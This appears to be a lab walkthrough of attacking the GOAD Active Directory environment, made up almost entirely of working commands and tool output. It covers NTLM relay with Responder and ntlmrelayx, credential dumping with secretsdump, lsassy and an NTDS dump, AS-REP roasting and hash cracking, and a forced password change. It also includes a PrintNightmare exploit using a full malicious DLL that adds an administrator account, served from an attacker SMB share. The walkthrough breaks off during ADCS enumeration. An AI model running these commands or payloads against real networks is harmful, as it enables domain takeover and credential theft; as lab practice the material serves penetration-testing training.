INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sevenkingdoms.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 16 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 9 ous
INFO: Found 19 containers
INFO: Found 2 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: kingslanding.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260406135855_bloodhound.zip

Next is essos.local.

┌──(bolke㉿kali)-[~/htb]
└─$ bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 14 users
INFO: Found 60 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: braavos.essos.local
INFO: Querying computer: meereen.essos.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260406135956_bloodhound.zip

I got three bloodhound results.

If you throw it at Bloodhound, it will display the relationships in a nice way.

We can see that the Administrator password is reused in Winterfell.

bolke@hacky:~/htb$ nxc winrm 192.168.56.10-12 192.168.56.22-23 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4'
WINRM       192.168.56.12   5985   MEEREEN          [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) 
WINRM       192.168.56.11   5985   WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.22   5985   CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.10   5985   KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) 
WINRM       192.168.56.23   5985   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) 
WINRM       192.168.56.11   5985   WINTERFELL       [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!)
WINRM       192.168.56.12   5985   MEEREEN          [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
WINRM       192.168.56.22   5985   CASTELBLACK      [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!)
WINRM       192.168.56.10   5985   KINGSLANDING     [-] sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
WINRM       192.168.56.23   5985   BRAAVOS          [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

That being said, let’s explore other authentication routes.

Gathers information about services with disabled SMB signing to launch NTLM relay attacks.

bolke@hacky:~/htb$ nxc smb 192.168.56.10-23 --gen-relay-list relay.txt
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

bolke@hacky:~/htb$ cat relay.txt 
192.168.56.23
192.168.56.22

Since we were able to obtain information about a target that was signing false, it seems we can relay NTLM authentication.

1st change /etc/proxychains4.conf  if not already done

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat /etc/proxychains4.conf
# proxychains.conf  VER 4.x
#
#        HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4     127.0.0.1 9050
socks4 127.0.0.1 1080

Change the Responder settings.

responder + ntlmrelayx to smb

Before starting responder to poison the answer to LLMNR, MDNS and NBT-NS request we must stop the responder smb and http server as we don’t want to get the hashes directly but we want to relay them to ntlmrelayx.

sed -i 's/HTTP = On/HTTP = Off/g' /etc/Responder/Responder.conf && cat /etc/Responder/Responder.conf | grep --color=never 'HTTP ='
HTTP = OFF
sed -i 's/SMB = On/SMB = Off/g' /etc/Responder/Responder.conf && cat /etc/Responder/Responder.conf | grep --color=never 'SMB ='
SMB = OFF

.

Start ntlmrelayx.

impacket-ntlmrelayx -tf relay.txt --no-http-server -smb2support -socks

.

• -tf : list of targets to relay the authentication
• -of : output file, this will keep the captured smb hashes just like we did before with responder, to crack them later
• -smb2support : support for smb2
• -socks : will start a socks proxy to use relayed authentication

┌──(bolke㉿kali)-[~]
└─$ sudo responder -I eth1
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [OFF]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [OFF]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth1]
    Responder IP               [192.168.56.104]
    Responder IPv6             [fe80::a00:27ff:feee:2051]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-8Q1R401PCMO]
    Responder Domain Name      [EXXR.LOCAL]
    Responder DCE-RPC Port     [46008]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder

[+] Listening for events...

.

After waiting for 5 minutes with ntlmrelayx running, the following will be output:

impacket-ntlmrelayx -tf relay.txt --no-http-server -smb2support -socks

So, I was able to use the socks proxy while performing a man-in-the-middle attack.

Then, we connect using proxychains and run secretsdump.

We use secretsdump to get SAM database, LSA cached logon, machine account and some DPAPI informations

proxychains4 impacket-secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

Next, let’s use lsassy to get LSASS information.    https://github.com/login-securite/lsassy

• Use lsassy to get the lsass process stored credentials
• Domain accounts informations are stored in the LSASS process so make a dump of this process can give you more domain accounts and privileges.
• Lsassy allow you to dump lsass remotely (very more convenient then doing a procdump, download of the lsass dump file and doing pypykatz or mimikatz locally), it do all the painful actions like dump and read lsass content for you (it also dump only the usefull part of the lsass dump optimizing the time of transfer). (lsassy also exist as a cme module)

┌──(bolke㉿kali)-[~/htb]
└─$ proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
192.168.56.22 - NORTH\robb.stark                                    [NT] 831486ac7f26860c9e2f51ac91e1a07a | [SHA1] 3bea28f1c440eed7be7d423cefebb50322ed7b6c                                                                      
192.168.56.22 - NORTH\CASTELBLACK$                                  [NT] 0faddc16c56adadd3e13a71c9efba7bc | [SHA1] 1d9a69e9e5fbdf5a0b658b2dc638d82097a35f70                                                                      
192.168.56.22 - north.sevenkingdoms.local\CASTELBLACK$              [PWD] >]N$&9 4X4k7u#0bij+?r2 AbvrtHuVM\e/qj^S-0RJ<T<zR./HRU3GNS&`RZHE'?d#*Oi(fJ9nT87',fopkB;@B-21K6<&/&v"6d..= P(E7hs4PwMDX"oB                               
192.168.56.22 - NORTH\sql_svc                                       [NT] 84a5092f53390ea48d660be52b93b804 | [SHA1] 9fd961155e28b1c6f9b3859f32f4779ad6a06404                                                                      
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\sql_svc                   [PWD] YouWillNotKerboroast1ngMeeeeee                                              
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\robb.stark                [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:17 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_de6981bd_20260406161757.kirbi)                                                          
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\robb.stark                [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:17 (TGT_NORTH.SEVENKINGDOMS.LOCAL_robb.stark_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_a99ebdc4_20260406161757.kirbi)                                                          
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_1b7a94a3_20260406161552.kirbi)                                                        
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_ad351161_20260406161552.kirbi)                                                        
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_e1c864e7_20260406161535.kirbi)                                                        
192.168.56.22 - NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$              [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2026-04-06 16:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_8f5807b4_20260406161535.kirbi)                                                        
14 Kerberos tickets written to /home/bolke/.config/lsassy/tickets
5 masterkeys saved to /home/bolke/.config/lsassy/masterkeys.txt

.

My third favorite tool to retreive secrets of windows with linux is donPAPI, it is used to get dpapi and other passwords stored informations (files, browser, schedule tasks,…). This tool don’t touch LSASS so it is stealthier and work most of the time even if av and edr are enabled on the target.

• DonPapi give us the stored password for the sql service sql_svc:YouWillNotKerboroast1ngMeeeeee
• We also get the password of robb.stark due to a scheduled task setup on this computer too.

Smbclient

• Connect directly to the smbserver with smbclient proxychains impacket-smbclient -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

┌──(bolke㉿kali)-[~/htb]
└─$ proxychains impacket-smbclient -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
Type help for list of commands
# shares
ADMIN$
all
C$
IPC$
public
# use C$
# ls
drw-rw-rw-          0  Fri Mar 27 16:39:32 2026 $Recycle.Bin
drw-rw-rw-          0  Fri Mar 27 19:43:14 2026 AD
drw-rw-rw-          0  Fri Mar 27 18:26:34 2026 Config.Msi
-rw-rw-rw-        660  Fri Mar 27 17:31:13 2026 dns_log.txt
drw-rw-rw-          0  Wed May 12 13:38:56 2021 Documents and Settings
drw-rw-rw-          0  Fri Mar 27 17:51:29 2026 inetpub
-rw-rw-rw-  536870912  Mon Apr  6 15:14:48 2026 pagefile.sys
drw-rw-rw-          0  Wed May 12 06:56:39 2021 PerfLogs
drw-rw-rw-          0  Fri Mar 27 18:25:32 2026 Program Files
drw-rw-rw-          0  Fri Mar 27 18:25:46 2026 Program Files (x86)
drw-rw-rw-          0  Fri Mar 27 17:57:05 2026 ProgramData
drw-rw-rw-          0  Fri Mar 27 16:38:46 2026 Recovery
drw-rw-rw-          0  Fri Mar 27 17:55:09 2026 setup
drw-rw-rw-          0  Fri Mar 27 18:32:12 2026 shares
drw-rw-rw-          0  Wed May 12 13:38:15 2021 System Volume Information
drw-rw-rw-          0  Mon Apr  6 12:16:00 2026 tmp
drw-rw-rw-          0  Mon Apr  6 12:33:54 2026 Users
drw-rw-rw-          0  Wed Apr  1 09:46:53 2026 Windows
# 

.

Code execution : smbexec or atexec 

• With a socks connection you can only use smbexec or atexec. Neither wmiexec, psexec nor dcomexec will work. (explainations here : https://github.com/SecureAuthCorp/impacket/issues/412 )

proxychains impacket-smbexec -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug

┌──(bolke㉿kali)-[~/htb]
└─$ proxychains impacket-smbexec -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:192.168.56.22[\pipe\svcctl]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[+] Executing %COMSPEC% /Q /c echo cd  ^> \\%COMPUTERNAME%\C$\__output_NNyAhmIt 2^>^&1 > %SYSTEMROOT%\gPFLQSYV.bat & %COMSPEC% /Q /c %SYSTEMROOT%\gPFLQSYV.bat & del %SYSTEMROOT%\gPFLQSYV.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\%COMPUTERNAME%\C$\__output_NNyAhmIt 2^>^&1 > %SYSTEMROOT%\emBwHcPK.bat & %COMSPEC% /Q /c %SYSTEMROOT%\emBwHcPK.bat & del %SYSTEMROOT%\emBwHcPK.bat
nt authority\system

C:\Windows\system32>hostname
[+] Executing %COMSPEC% /Q /c echo hostname ^> \\%COMPUTERNAME%\C$\__output_NNyAhmIt 2^>^&1 > %SYSTEMROOT%\WLlQBNSv.bat & %COMSPEC% /Q /c %SYSTEMROOT%\WLlQBNSv.bat & del %SYSTEMROOT%\WLlQBNSv.bat
castelblack

C:\Windows\system32>

.

You have full Administrator privileges for winterfell.

Extra

PrintNightmare

To exploit printnightmare we will first check if the spooler is active on targets

Meereen Walkthrough

I looked at users who have ASREPRoast enabled on bloodhound and found ESOSS.LOCAL/MISSANDEI.

Let’s try running ASREPRoast.

┌──(kali㉿kali)-[~] 
└─$ nxc ldap 192.168.56.23 -u missandei -p '' --asreproast asreproast.hash 
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
LDAP 192.168.56.23 445 BRAAVOS $krb5asrep$23$missandei@ESSOS.LOCAL:dcdfca025e409115dac3015ad2bdad49$8d5164d380201364641c6765135d0f1f396f15de39d107f3a23685f1b6aaacd52 c765146c336f31d9e33d59d614cfc1c05e0bc2bd414dcdee30acf84fef1d469d411 ecadb1ef16ba740692505fb983c5d335bd8d3c120f28f3476ef566a517629863f24 e68cd0d56ce56bd0b617b1bacaeb375d4b06a726809f6fef115cf8eecd0337611e4 259618593628c5058b5d86e9b994b555340086d4f72c57f9954dfd159e8e071d415 b2e8b9e85a3990e300b7253d3f0673c2e317f549dada4fc4b80c6f298f9bc296f1 fb077ddcf7aa31e9592b98bd7f11c572d0132b4fc8b38ce5543ba9415b28bc163e42

.

I’ll call john.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt asreproast.hash              
Using default input encoding: UTF-8 
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) 
Will run 4 OpenMP threads 
Press 'q' or Ctrl-C to abort, almost any other key for status 
fr3edom ($krb5asrep$23$missandei@ESSOS.LOCAL)      
1g 0:00:00:01 DONE (2024-10-19 16:58) 0.8333g/s 1496Kp/s 1496Kc/s 1496KC/s franciene..found9tion 
Use the "--show" option to display all of the cracked passwords reliably 
Session completed.

missandei/fr3edomI got the authentication information.

In bloodhound, missandei has GenericAll permissions for the user khal.drago.

So change the password for khal.drogo.

The tool we will use is ldap_shell .

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ ldap_shell essos.local/missandei -dc-host essos.local 
Password: 
[INFO] Starting interactive shellandei 
 
# 
miss missandei# change_password khal.drogo horse 
[INFO] Got User DN: CN=khal.drogo,CN=Users,DC=essos,DC=local 
[INFO] Attempting to set new password of: horse 
[INFO] Password changed successfully!

So khal.drogo/horsewe get the credentials to rewrite the password.

If you try checking, you will see that the authentication information has been properly obtained.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ nxc smb braavos -u khal.drogo -p horse                             
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\khal.drogo:horse (Pwn3d!)

It looks like winrm is also authenticated.

bolke@hacky:~$ nxc winrm braavos -u khal.drogo -p horse
WINRM       192.168.56.23   5985   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) 
WINRM       192.168.56.23   5985   BRAAVOS          [+] essos.local\khal.drogo:horse (Pwn3d!)

For now, evil-winrm has given us a foothold.

bolke@hacky:~$ ewp -u khal.drogo -p horse -i braavos
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to 'braavos:5985' as 'khal.drogo'
evil-winrm-py PS C:\Users\khal.drogo\Documents>

We will investigate whether Printnightmare can be used to escalate privileges.

#include <windows.h> 

int RunCMD() 
{ 
    system("net users pnightmare Passw0rd123. /add"); 
    system("net localgroup administrators pnightmare /add"); 
    return 0; 
} 

BOOL APIENTRY DllMain(HMODULE hModule, 
    DWORD ul_reason_for_call, 
    LPVOID lpReserved 
) 
{ 
    switch (ul_reason_for_call) 
    { 
    case DLL_PROCESS_ATTACH: 
        RunCMD(); 
        break; 
    case DLL_THREAD_ATTACH: 
    case DLL_THREAD_DETACH: 
    case DLL_PROCESS_DETACH: 
        break; 
    } 
    return TRUE; 
}

This is the code that creates and adds a user called pnightmare to the administrators group when the DLL is attached to a process.

compile

x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Clone the code from PrintNightmare.

git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare

Publish the DLL via SMB.

smbserver.py -smb2support ATTACKERSHARE .

And then run Printnightmare.

┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] 
└─$ python3 CVE-2021-1675.py essos.local/khal.drogo:horse@meereen.essos.local '\\192.168.56.104\ATTACKSHARE\nightmare.dll' 
[*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss] 
[+] Bind OK 
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL 
[*] Executing \??\UNC\192.168.56.104\ATTACKSHARE\nightmare.dll 
[*] Try 1... 
[*] Stage0: 0 
[*] Try 2... 
[*] Stage0: 0 
[*] Stage2: 0 
[+] Exploit Completed

pnightmare/Passw0rd123.I got it.

You can see that this can be done by infiltrating with evil-winrm.

┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] 
└─$ evil-winrm -u pnightmare -p Passw0rd123. -i meereen 
                                        
Evil-WinRM shell v3.5 
                                        
Warning: Remote path completions is disabled due to ruby ​​limitation: quoting_detection_proc() function is unimplemented on this machine 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
                                        
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\pnightmare\Documents> whoami /priv 

PRIVILEGES INFORMATION 
---------------------- 

Privilege Name Description State 
========================================== ========================================================================== 
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled 
SeMachineAccountPrivilege Add workstations to domain Enabled 
SeSecurityPrivilege Manage auditing and security log Enabled 
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled 
SeLoadDriverPrivilege Load and unload device drivers Enabled 
SeSystemProfilePrivilege Profile system performance Enabled 
SeSystemtimePrivilege Change the system time Enabled 
SeProfileSingleProcessPrivilege Profile single process Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled 
SeCreatePagefilePrivilege Create a pagefile Enabled 
SeBackupPrivilege Back up files and directories Enabled 
SeRestorePrivilege Restore files and directories Enabled 
SeShutdownPrivilege Shut down the system Enabled 
SeDebugPrivilege Debug programs Enabled 
SeSystemEnvironmentPrivilege Modify firmware environment values ​​Enabled 
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled 
SeUndockPrivilege Remove computer from docking station Enabled 
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled 
SeManageVolumePrivilege Perform volume maintenance tasks Enabled 
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege Create global objects Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled 
SeTimeZonePrivilege Change the time zone Enabled 
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled 
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled 
*Evil-WinRM* PS C:\Users\pnightmare\Documents>

So we have the NTLM hash.

┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] 
└─$ nxc smb meereen.essos.local -u pnightmare -p Passw0rd123. --ntds 
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] 
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
SMB 192.168.56.12 445 MEEREEN [+] essos.local\pnightmare:Passw0rd123. (Pwn3d!) 
SMB 192.168.56.12 445 MEEREEN [+] Dumping the NTDS, this could take a while so go grab a redbull... 
SMB 192.168.56.12 445 MEEREEN Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da::: 
SMB 192.168.56.12 445 MEEEREEN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
SMB 192.168.56.12 445 MEEEREEN krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54798535f08dafb2f3ab805bb312961d::: 
SMB 192.168.56.12 445 MEEREEN DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
SMB 192.168.56.12 445 MEEREEN vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: 
SMB 192.168.56.12 445 MEEREEN daenerys.targaryen:1112:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a::: 
SMB 192.168.56.12 445 MEEREEN viserys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097::: 
SMB 192.168.56.12 445 MEEREEN khal.drogo:1114:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021::: 
SMB 192.168.56.12 445 MEEREEN jorah.mormont:1115:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611::: 
SMB 192.168.56.12 445 MEEREEN missandei:1116:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec::: 
SMB 192.168.56.12 445 MEEREEN drogon:1117:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6::: 
SMB 192.168.56.12 445 MEEREEN sql_svc:1118:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: 
SMB 192.168.56.12 445 MEEREEN pnightmare:1121:aad3b435b51404eeaad3b435b51404ee:58cf12d7448ca3ea7da502c83ee6a31e::: 
SMB 192.168.56.12 445 MEEREEN MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:f05997d79fa50e0346a4d593d8eb1741::: 
SMB 192.168.56.12 445 MEEREEN BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:0d8d114e49ff85a35b3c97208d88dcf3:::
SMB 192.168.56.12 445 MEEREEN gmsaDragon$:1119:aad3b435b51404eeaad3b435b51404ee:563b455a419089dfbfa829cab9f2b174::: 
SMB 192.168.56.12 445 MEEREEN removemiccomputer$:1120:aad3b435b51404eeaad3b435b51404ee:1e986d18a9b7c9543e2d57944e8656b7::: 
SMB 192.168.56.12 445 MEEREEN SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:743ab45cdf64d2f368f501fd348ab3d8::: 
SMB 192.168.56.12 445 MEEREEN [+] Dumped 18 NTDS hashes to /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds of which 13 were added to the database                                                                                                                                
SMB 192.168.56.12 445 MEEREEN [*] To extract only enabled accounts from the output file, run the following command: 
SMB 192.168.56.12 445 MEEREEN [*] cat /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | grep -iv disabled | cut -d ':' -f1 
SMB 192.168.56.12 445 MEEREEN [*] grep -iv disabled /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | cut -d ':' -f1

Braavos Strategy

Braavos, under Meereen’s command, is an ADCS. I’d like to attack the ADCS area as well.

Spectorops’s document provides detailed information on ADCS attacks.

https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf

Let’s try to get the contents of ADCS.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ certipy-ad find -u 'khal.drogo' -p horse -dc-ip 192.168.56.12 -vulnerable -enabled                              
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Finding certificate templates 
[*] Found 38 certificate templates 
[*] Finding certificate authorities 
[*] Found 1 certificate authority 
[*] Found 16 enabled certificate templates 
[*] Trying to get CA configuration for 'ESSOS-CA' via CSRA 
[*] Got CA configuration for 'ESSOS-CA' 
[*] Saved BloodHound data to '20241023161533_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k 
[*] Saved text output to '20241023161533_Certipy.txt' 
[*] Saved JSON output to '20241023161533_Certipy.json' 
                                                                                                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/goad/braavos] 
└─$ cat 20241023161533_Certipy.txt                                                     
Certificate Authorities 
  0 
    CA Name: ESSOS-CA 
    DNS Name: braavos.essos.local 
    Certificate Subject: CN=ESSOS-CA, DC=essos, DC=local 
    Certificate Serial Number: 5120F6B8733E26BC43F390382A65D06B 
    Certificate Validity Start: 2024-08-11 03:37:50+00:00 
